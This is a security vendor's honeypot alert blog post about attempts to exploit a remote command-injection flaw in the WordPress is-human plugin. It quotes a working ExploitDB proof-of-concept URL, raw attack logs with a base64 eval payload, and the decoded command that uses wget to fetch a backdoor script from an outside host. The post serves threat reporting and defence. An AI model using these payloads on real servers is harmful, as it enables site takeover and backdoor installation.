LevelBlue

LevelBlue + SentinelOne: Global Partnership to Deliver AI-Powered Managed Security Operations and Incident Response. Learn More

Submit RFP Request a Demo

[Honeypot Alert] More WordPress is_human Plugin Remote Command Injection Attack Detected

Change theme to light
1 Minute Read by Ryan Barnett

As we first noted in a previous Honeypot Alert Blog post, our web honeypots have again received attempts to exploit a WordPress is-human pluging remote command injection vulnerability. ExploitDB lists the following data:

# Exploit Title: is-human (1.4.2 and prior) Worpdress plugin.
# Date: 16.05.2011
# Author: neworder [www.neworder-ind.net]
# Software Link: http://wordpress.org/extend/plugins/is-human/
# Version: 1.4.2
# Tested on: Linux Platform
The vulnerability exists in /is-human/engine.php .
It is possible to take control of the eval() function via the 'type' parameter, when the 'action' is set to log-reset. From here we can run out own code.
In order to avoid any errors we point the $is_hum->get_* array variable into $is_hum->get_ih and to close the execution without error we point it to php stored function error_log(). In between we may place our own php code and use the passthru() function to execute commands.
Execution running the linux whoami command:
http://server/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(whoami);error

Here are the attacks we picked up:

178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:38 +0000] "GET /wordpress//wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 404 568 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
178.137.167.112 - - [12/Mar/2012:11:14:42 +0000] "GET //wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgc2gucGhwJyk7));error HTTP/1.1" 301 765 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

As you can see, the attacker is injecting PHP eval and base64_decode calls into the vulnerable "type" parameter of the is_human WordPress plugin. The base64_decode call results in the following text:

passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt sh.php');

This attempts to access the OS level wget http client tool to download the "sh.txt" file on the remote site. Here is a snippet of the code:

 

When this code is executed by PHP, it results in a common web backdoor page such as the following screenshot which was taken from Google search results for other compromised hosts.


 


 

  Screen shot 2012-03-12 at 12.05.06 PM

ABOUT LEVELBLUE

LevelBlue is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Crypto Drainers as a Converging Threat: Insights into Emerging Hybrid Attack Ecosystems
A Closer Look at the Novel and Stealthy KarstoRAT Malware
Go With the Flow: Abusing OAuth Device Code Flow

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo

Stay Informed

Sign up to receive the latest security news and trends straight to your inbox from LevelBlue.
© Copyright 2026